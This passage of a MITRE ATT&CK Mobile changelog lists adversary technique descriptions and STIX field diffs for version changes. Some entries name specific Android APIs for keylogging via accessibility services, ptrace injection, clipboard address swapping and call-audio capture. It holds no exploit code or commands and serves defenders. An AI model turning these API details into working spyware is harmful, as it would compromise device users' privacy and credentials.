capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific input prompts and/or advertisements.


[T1628] Hide Artifacts

Current version: 1.0

Description: Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application’s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.


[T1625] Hijack Execution Flow

Current version: 1.0

Description: Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time. There are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.


[T1629] Impair Defenses

Current version: 1.0

Description: Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.


[T1430.002] Location Tracking: Impersonate SS7 Nodes

Current version: 1.0

Description: Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7)


[T1630] Indicator Removal on Host

Current version: 1.0

Description: Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.


[T1634.001] Credentials from Password Store: Keychain

Current version: 1.0

Description: Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials. On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, adversaries can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)


[T1417.001] Input Capture: Keylogging

Current version: 1.0

Description: Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them. Some methods of keylogging include: * Masquerading as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested. * Abusing accessibility features. On Android, adversaries may abuse accessibility features to record keystrokes by registering an `AccessibilityService` class, overriding the `onAccessibilityEvent` method, and listening for the `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED` event type. The event object passed into the function will contain the data that the user typed. *Additional methods of keylogging may be possible if root access is available.


[T1481.003] Web Service: One-Way Communication

Current version: 1.0

Description: Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.


[T1644] Out of Band Data

Current version: 2.0

Description: Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth. On Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there. On iOS, there is no way to programmatically read push notifications.


[T1629.001] Impair Defenses: Prevent Application Removal

Current version: 1.0

Description: Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step. Adversaries may also abuse the device accessibility APIs to prevent removal. This set of APIs allows the application to perform certain actions on behalf of the user and programmatically determine what is being shown on the screen. The malicious application could monitor the device screen for certain modals (e.g., the confirmation modal to uninstall an application) and inject screen input or a back button tap to close the modal.


[T1631] Process Injection

Current version: 1.0

Description: Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. Both Android and iOS have no legitimate way to achieve process injection. The only way this is possible is by abusing existing root access or exploiting a vulnerability.


[T1636] Protected User Data

Current version: 1.0

Description: Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application’s manifest. On iOS, they must be included in the application’s `Info.plist` file. In almost all cases, the user is required to grant access to the data store that the application is trying to access. In recent OS versions, vendors have introduced additional privacy controls for users, such as the ability to grant permission to an application only while the application is being actively used by the user. If the device has been jailbroken or rooted, an adversary may be able to access [Protected User Data](https://attack.mitre.org/techniques/T1636) without the user’s knowledge or approval.


[T1631.001] Process Injection: Ptrace System Calls

Current version: 1.0

Description: Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using `malloc`) then invoking that memory with `PTRACE_SETREGS` to set the register containing the next instruction to execute. Ptrace system call injection can also be done with `PTRACE_POKETEXT`/`PTRACE_POKEDATA`, which copy data to a specific address in the target process's memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) Ptrace system call injection may not be possible when targeting processes with high-privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.


[T1430.001] Location Tracking: Remote Device Management Services

Current version: 1.0

Description: An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location)


[T1636.004] Protected User Data: SMS Messages

Current version: 1.0

Description: Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages. If the device has been jailbroken or rooted, an adversary may be able to access [SMS Messages](https://attack.mitre.org/techniques/T1636/004) without the user’s knowledge or approval.


[T1418.001] Software Discovery: Security Software Discovery

Current version: 1.0

Description: Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.


[T1406.002] Obfuscated Files or Information: Software Packing

Current version: 1.0

Description: Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Utilities used to perform software packing are called packers. An example packer is FTT. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.


[T1635] Steal Application Access Token

Current version: 1.0

Description: Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system “Open With” dialogue. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework used to issue tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry through OAuth 2.0 using a variety of authorization protocols. An example of a commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested without requiring user credentials.


[T1406.001] Obfuscated Files or Information: Steganography

Current version: 1.0

Description: Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.


[T1632] Subvert Trust Controls

Current version: 1.0

Description: Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features include: an app being allowed to run because it is signed by a valid code signing certificate; an OS prompt alerting the user that an app came from an untrusted source; or getting an indication that you are about to connect to an untrusted site. The method adversaries use will depend on the specific mechanism they seek to subvert.


[T1628.001] Hide Artifacts: Suppress Application Icon

Current version: 1.0

Description: A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions. This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker) Beginning in Android 10, changes were introduced to inhibit malicious applications’ ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application’s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app’s details page in the system settings. If the user clicks the synthesized activity in the launcher, they are taken to the application’s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)


[T1521.001] Encrypted Channel: Symmetric Cryptography

Current version: 1.0

Description: Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.


[T1633.001] Virtualization/Sandbox Evasion: System Checks

Current version: 1.0

Description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Hardware checks, such as the presence of motion sensors, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.


[T1625.001] Hijack Execution Flow: System Runtime API Hijacking

Current version: 1.0

Description: Adversaries may execute their own malicious payloads by hijacking the way an operating system run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time. On Android, adversaries may overwrite the standard OS API library with a malicious alternative to hook into core functions to achieve persistence. By doing this, the adversary’s code will be executed every time the overwritten API function is called by an app on the infected device.


[T1641.001] Data Manipulation: Transmitted Data Manipulation

Current version: 1.0

Description: Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact. One method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the `ClipboardManager.OnPrimaryClipChangedListener` interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10. Adversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to being pasted. For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control. [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)


[T1635.001] Steal Application Access Token: URI Hijacking

Current version: 1.0

Description: Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data. Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)


[T1630.001] Indicator Removal on Host: Uninstall Malicious Application

Current version: 1.0

Description: Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: * Abusing device owner permissions to perform silent uninstallation using device owner API calls. * Abusing root permissions to delete files from the filesystem. * Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.


[T1623.001] Command and Scripting Interpreter: Unix Shell

Current version: 1.0

Description: Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken. Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.


[T1628.002] Hide Artifacts: User Evasion

Current version: 1.0

Description: Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.


[T1633] Virtualization/Sandbox Evasion

Current version: 1.0

Description: Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors. Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) such as checking for system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment.


[T1437.001] Application Layer Protocol: Web Protocols

Current version: 1.0

Description: Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server. Web protocols such as HTTP and HTTPS are used for web traffic as well as well as notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device). Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order blend in with routine device traffic making it difficult for enterprises to inspect.

Major Version Changes

[T1532] Archive Collected Data

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Data is encrypted before being exfiltrated in order to hide t1Adversaries may compress and/or encrypt data that is collect
>the information that is being exfiltrated from detection or >ed prior to exfiltration. Compressing data can help to obfus
>to make the exfiltration less conspicuous upon inspection by>cate its contents and minimize use of network resources. Enc
> a defender. The encryption is performed by a utility, progr>ryption can be used to hide information that is being exfilt
>amming library, or custom algorithm on the data itself and i>rated from detection or make exfiltration less conspicuous u
>s considered separate from any encryption performed by the c>pon inspection by a defender.      Both compression and encr
>ommand and control or file transfer protocol. Common file fo>yption are done prior to exfiltration, and can be performed 
>rmats that can encrypt files are RAR and zip.>using a utility, programming library, or custom algorithm.  
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-10-10 15:00:44.181000+00:002022-04-01 15:01:02.140000+00:00
nameData EncryptedArchive Collected Data
descriptionData is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file formats that can encrypt files are RAR and zip.Adversaries may compress and/or encrypt data that is collected prior to exfiltration. Compressing data can help to obfuscate its contents and minimize use of network resources. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be performed using a utility, programming library, or custom algorithm.
kill_chain_phases[0]['phase_name']exfiltrationcollection
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_detectionMany encryption mechanisms are built into standard application-accessible APIs, and are therefore undetectable to the end user.Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.
x_mitre_version1.02.0

[T1429] Audio Capture

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1Adversaries may capture audio to collect information on a ust1Adversaries may capture audio to collect information by leve
>er of a mobile device using standard operating system APIs. >raging standard operating system APIs of a mobile device. Ex
>Adversaries may target audio information such as user conver>amples of audio information adversaries may target include u
>sations, surroundings, phone calls, or other sensitive infor>ser conversations, surroundings, phone calls, or other sensi
>mation.  Android and iOS, by default, requires that an appli>tive information.      Android and iOS, by default, require 
>cation request access to microphone devices from the user. I>that applications request device microphone access from the 
>n Android, applications must hold the <code>android.permissi>user.       On Android devices, applications must hold the `
>on.RECORD_AUDIO</code> permission to access the microphone a>RECORD_AUDIO` permission to access the microphone or the `CA
>nd the <code>android.permission.CAPTURE_AUDIO_OUTPUT</code> >PTURE_AUDIO_OUTPUT` permission to access audio output. Becau
>permission to access audio output such as speakers. Android >se Android does not allow third-party applications to hold t
>does not allow third-party applications to hold <code>androi>he `CAPTURE_AUDIO_OUTPUT` permission by default, only privil
>d.permission.CAPTURE_AUDIO_OUTPUT</code>, so audio output ca>eged applications, such as those distributed by Google or th
>n only be obtained by privileged applications (distributed b>e device vendor, can access audio output.(Citation: Android 
>y Google or the device vendor) or after a successful privile>Permissions) However, adversaries may be able to gain this a
>ge escalation attack. In iOS, applications must include the >ccess after successfully elevating their privileges. With th
>`NSMicrophoneUsageDescription` key in their `Info.plist` fil>e `CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass th
>e.>e `MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaR
 >ecorder.setAudioOutput`, allowing capture of both voice call
 > uplink and downlink.(Citation: Manifest.permission)      On
 > iOS devices, applications must include the `NSMicrophoneUsa
 >geDescription` key in their `Info.plist` file to access the 
 >microphone.(Citation: Requesting Auth-Media Capture)

New Mitigations:

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAndroid Developers. (2022, March 17). Voice Call. Retrieved April 1, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1032
external_referencesAPP-19
values_changed
STIX FieldOld valueNew Value
modified2019-09-20 17:59:11.041000+00:002022-04-29 17:29:49.023000+00:00
nameCapture AudioAudio Capture
descriptionAdversaries may capture audio to collect information on a user of a mobile device using standard operating system APIs. Adversaries may target audio information such as user conversations, surroundings, phone calls, or other sensitive information. Android and iOS, by default, requires that an application request access to microphone devices from the user. In Android, applications must hold the android.permission.RECORD_AUDIO permission to access the microphone and the android.permission.CAPTURE_AUDIO_OUTPUT permission to access audio output such as speakers. Android does not allow third-party applications to hold android.permission.CAPTURE_AUDIO_OUTPUT, so audio output can only be obtained by privileged applications (distributed by Google or the device vendor) or after a successful privilege escalation attack. In iOS, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file.Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information. Android and iOS, by default, require that applications request device microphone access from the user. On Android devices, applications must hold the `RECORD_AUDIO` permission to access the microphone or the `CAPTURE_AUDIO_OUTPUT` permission to access audio output. Because Android does not allow third-party applications to hold the `CAPTURE_AUDIO_OUTPUT` permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the `CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass the `MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaRecorder.setAudioOutput`, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission) On iOS devices, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file to access the microphone.(Citation: Requesting Auth-Media Capture)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueManifest.permission
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.htmlhttps://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL
x_mitre_detectionOn both Android (6.0 and up) and iOS, the user can view which applications have permission to use the microphone through the device settings screen, and the user can choose to revoke the permissions.In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware) In Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators) Android applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized. In both Android (6.0 and up) and iOS, users can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary.
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Requesting Auth-Media Capture', 'description': 'Apple Developers. (n.d.). Requesting Authorization for Media Capture on iOS. Retrieved April 1, 2022.', 'url': 'https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios'}
external_references{'source_name': 'Android Permissions', 'description': 'Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.', 'url': 'https://developer.android.com/reference/android/Manifest.permission'}
external_references{'source_name': 'Android Privacy Indicators', 'description': 'Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.', 'url': 'https://source.android.com/devices/tech/config/privacy-indicators'}
external_references{'source_name': 'iOS Mic Spyware', 'description': 'ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.', 'url': 'https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html', 'external_id': 'APP-19'}

[T1398] Boot or Logon Initialization Scripts

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1If an adversary can escalate privileges, he or she may be abt1Adversaries may use scripts automatically executed at boot o
>le to use those privileges to place malicious code in the de>r logon initialization to establish persistence. Initializat
>vice kernel or other boot partition components, where the co>ion scripts are part of the underlying operating system and 
>de may evade detection, may persist after device resets, and>are not accessible to the user unless the device has been ro
> may not be removable by the device user. In some cases (e.g>oted or jailbroken. 
>., the Samsung Knox warranty bit as described under Detectio 
>n), the attack may be detected but could result in the devic 
>e being placed in a state that no longer allows certain func 
>tionality.  Many Android devices provide the ability to unlo 
>ck the bootloader for development purposes, but doing so int 
>roduces the potential ability for others to maliciously upda 
>te the kernel or other boot partition code.  If the bootload 
>er is not unlocked, it may still be possible to exploit devi 
>ce vulnerabilities to update the code. 

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAndroid. (n.d.). Verified Boot. Retrieved December 21, 2016.
external_referencesAPP-27
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1001
external_referencesAPP-26
external_referencesSamsung. (n.d.). What is a Knox Warranty Bit and how is it triggered?. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-11 14:33:11.096000+00:00
nameModify OS Kernel or Boot PartitionBoot or Logon Initialization Scripts
descriptionIf an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device kernel or other boot partition components, where the code may evade detection, may persist after device resets, and may not be removable by the device user. In some cases (e.g., the Samsung Knox warranty bit as described under Detection), the attack may be detected but could result in the device being placed in a state that no longer allows certain functionality. Many Android devices provide the ability to unlock the bootloader for development purposes, but doing so introduces the potential ability for others to maliciously update the kernel or other boot partition code. If the bootloader is not unlocked, it may still be possible to exploit device vulnerabilities to update the code.Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken.
kill_chain_phases[0]['phase_name']defense-evasionpersistence
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid-VerifiedBoot
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.htmlhttps://source.android.com/security/verifiedboot/
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.htmlhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html
external_references[2]['external_id']APP-27APP-26
external_references[3]['source_name']Samsung-KnoxWarrantyBitNIST Mobile Threat Catalogue
external_references[3]['url']https://www2.samsungknox.com/en/faq/what-knox-warranty-bit-and-how-it-triggeredhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html
x_mitre_detectionThe Android SafetyNet API's remote attestation capability could potentially be used to identify and respond to compromised devices. Samsung KNOX also provides a remote attestation capability on supported Samsung Android devices. Samsung KNOX devices include a non-reversible Knox warranty bit fuse that is triggered "if a non-Knox kernel has been loaded on the device" (Citation: Samsung-KnoxWarrantyBit). If triggered, enterprise Knox container services will no longer be available on the device. As described in the iOS Security Guide (Citation: Apple-iOSSecurityGuide), iOS devices will fail to boot or fail to allow device activation if unauthorized modifications are detected. Many enterprise applications perform their own checks to detect and respond to compromised devices. These checks are not foolproof but can detect common signs of compromise.On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.
x_mitre_version1.02.0
iterable_item_removed
STIX FieldOld valueNew Value
kill_chain_phases{'kill_chain_name': 'mitre-mobile-attack', 'phase_name': 'persistence'}
external_references{'source_name': 'Apple-iOSSecurityGuide', 'description': 'Apple. (2016, May). iOS Security. Retrieved December 21, 2016.', 'url': 'https://www.apple.com/business/docs/iOS_Security_Guide.pdf'}

[T1414] Clipboard Data

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1Adversaries may abuse Clipboard Manager APIs to obtain sensit1Adversaries may abuse clipboard manager APIs to obtain sensi
>tive information copied to the global clipboard. For example>tive information copied to the device clipboard. For example
>, passwords being copy-and-pasted from a password manager ap>, passwords being copied and pasted from a password manager 
>p could be captured by another application installed on the >application could be captured by a malicious application ins
>device.(Citation: Fahl-Clipboard)  On Android, <code>Clipboa>talled on the device.(Citation: Fahl-Clipboard)      On Andr
>rdManager.OnPrimaryClipChangedListener</code> can be used by>oid, applications can use the `ClipboardManager.OnPrimaryCli
> applications to register as a listener and monitor the clip>pChangedListener()` API to register as a listener and monito
>board for changes.(Citation: Github Capture Clipboard 2019) >r the clipboard for changes. However, starting in Android 10
> Android 10 mitigates this technique by preventing applicati>, this can only be used if the application is in the foregro
>ons from accessing clipboard data unless the application is >und, or is set as the device’s default input method editor (
